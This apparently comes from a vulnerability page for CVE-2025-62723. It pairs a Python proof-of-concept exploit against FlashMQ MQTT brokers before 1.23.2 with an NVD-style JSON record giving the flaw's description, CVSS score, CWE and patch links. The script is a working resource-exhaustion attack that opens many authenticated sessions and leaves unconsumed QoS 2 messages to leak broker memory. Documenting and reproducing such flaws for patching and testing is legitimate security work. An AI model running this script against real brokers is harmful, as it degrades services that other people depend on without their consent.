CVE-2025-62723

import paho.mqtt.client as mqtt import time # CVE-2025-62723 PoC - FlashMQ Session Resource Exhaustion # Affected: FlashMQ < 1.23.2 BROKER_HOST = "target_server" BROKER_PORT = 1883 USERNAME = "attacker_user" PASSWORD = "attacker_pass" NUM_SESSIONS = 100 def on_connect(client, userdata, flags, rc, properties=None): if rc == 0: print(f"[+] Connected to MQTT broker with session: {client._client_id.decode()}") # Subscribe to create retained messages client.subscribe("test/topic", qos=2) # Publish QoS 2 messages that won't be consumed for i in range(10): client.publish(f"test/topic/{i}", payload=f"msg_{i}", qos=2) print(f"[+] Published 10 QoS2 messages") else: print(f"[-] Connection failed with code: {rc}") def create_exploit_session(session_id): """Create a new session that will leak messages on expiration""" client = mqtt.Client(client_id=f"exploit_session_{session_id}") client.username_pw_set(USERNAME, PASSWORD) client.on_connect = on_connect try: client.connect(BROKER_HOST, BROKER_PORT, keepalive=60) client.loop_start() time.sleep(2) client.loop_stop() client.disconnect() except Exception as e: print(f"[-] Session {session_id} failed: {e}") def main(): print("[*] CVE-2025-62723 FlashMQ Resource Exhaustion PoC") print(f"[*] Target: {BROKER_HOST}:{BROKER_PORT}") print(f"[*] Creating {NUM_SESSIONS} exploit sessions...") for i in range(NUM_SESSIONS): create_exploit_session(i) time.sleep(0.5) if i % 10 == 0: print(f"[*] Progress: {i}/{NUM_SESSIONS}") print("[*] Attack complete. Sessions expired but messages not released.") print("[*] Monitor broker memory usage to confirm resource exhaustion.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62723", "sourceIdentifier": "[email protected]", "published": "2025-10-24T21:16:14.010", "lastModified": "2025-10-31T19:31:48.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FlashMQ is a MQTT broker/server, designed for multi-CPU environments. Prior to version 1.23.2, any authenticated user can create sessions and have them collect QoS messages. When not sent to a client, these are then not released upon (eventual) session expiration. Version 1.23.2 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-772"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flashmq:flashmq:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.23.2", "matchCriteriaId": "9C982456-FF92-4CA6-A9FC-4F874E45FD8E"}]}]}], "references": [{"url": "https://github.com/halfgaar/FlashMQ/commit/e86c49360ef4387440c97f591770cdb9284b4ee9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/halfgaar/FlashMQ/issues/154", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/halfgaar/FlashMQ/security/advisories/GHSA-7mhp-22q4-r6vv", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}